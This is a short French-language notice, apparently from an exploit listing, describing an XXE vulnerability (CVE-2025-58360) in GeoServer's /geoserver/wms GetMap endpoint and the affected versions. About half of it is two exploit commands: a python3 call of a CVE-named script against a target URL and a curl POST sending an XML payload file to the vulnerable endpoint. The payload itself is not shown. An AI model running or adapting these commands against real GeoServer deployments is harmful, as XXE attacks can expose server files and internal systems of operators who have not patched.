
XXE via un point de terminaison spécifique /geoserver/wms opération GetMap - Geoserver
De la version 2.26.0 jusqu'à avant la version 2.26.2 et dans les versions antérieures à la 2.25.6, une vulnérabilité de type Entité Externe XML (XXE) a été identifiée. L'application accepte des entrées XML via un point de terminaison spécifique /geoserver/wms opération GetMap

Exploit1:
python3 CVE-2025-58360 -u http://example.com
Exploit2:
curl -X POST "http://example.com/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" -H "Content-Type: application/xml" --data-binary @payload.xml -o output.png